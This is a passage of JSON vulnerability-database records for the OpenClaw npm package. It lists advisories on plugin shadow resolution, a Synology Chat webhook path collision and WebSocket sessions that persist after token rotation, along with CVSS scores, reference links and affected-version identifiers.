enclaw/security/advisories/GHSA-82qx-6vj7-p8m2","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T11:54:14Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-82qx-6vj7-p8m2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43571","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43571"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-untrusted-workspace-plugin-shadow-resolution-in-channel-setup","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T11:54:14Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-untrusted-workspace-plugin-shadow-resolution-in-channel-setup"},{"reference_url":"https://github.com/advisories/GHSA-82qx-6vj7-p8m2","reference_id":"GHSA-82qx-6vj7-p8m2","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-82qx-6vj7-p8m2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["CVE-2026-43571","GHSA-82qx-6vj7-p8m2"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ns77-4wfj-9ka6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89423?format=json","vulnerability_id":"VCID-nszj-2u6y-xqcb","summary":"Duplicate Advisory: OpenClaw Bypasses DM Policy Separation via Synology Chat Webhook Path Collision\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-rqp8-q22p-5j9q This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.22 contains a webhook path route replacement vulnerability in the Synology Chat extension that allows attackers to collapse multi-account configurations onto shared webhook paths. Attackers can exploit inherited or duplicate webhook paths to bypass per-account DM access control policies and replace route ownership across accounts.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/980940aa58f862da4e19372597bbc2a9f268d70b","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/980940aa58f862da4e19372597bbc2a9f268d70b"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rqp8-q22p-5j9q","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rqp8-q22p-5j9q"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35635","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35635"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-webhook-path-route-replacement-vulnerability-in-synology-chat","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-webhook-path-route-replacement-vulnerability-in-synology-chat"},{"reference_url":"https://github.com/advisories/GHSA-g8mc-c5f2-mqg7","reference_id":"GHSA-g8mc-c5f2-mqg7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g8mc-c5f2-mqg7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["GHSA-g8mc-c5f2-mqg7"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nszj-2u6y-xqcb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89492?format=json","vulnerability_id":"VCID-ntwt-jkgr-sffu","summary":"OpenClaw: Existing WS sessions survive shared gateway token rotation\n## Impact\n\nExisting WS sessions survive shared gateway token rotation.\n\nRotating the shared gateway token did not disconnect existing shared-token WebSocket sessions.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42421","reference_id":"","reference_type":"","scores":[{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10417","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10395","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10436","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42421"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5h3f-885m-v22w","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:15:14Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5h3f-885m-v22w"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42421","reference_id":"CVE-2026-42421","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42421"},{"reference_url":"https://github.com/advisories/GHSA-5h3f-885m-v22w","reference_id":"GHSA-5h3f-885m-v22w","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5h3f-885m-v22w"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-websocket-session-persistence-via-shared-gateway-token-rotation","reference_id":"openclaw-websocket-session-persistence-via-shared-gateway-token-rotation","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:15:14Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-websocket-session-persistence-via-shared-gateway-token-rotation"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VC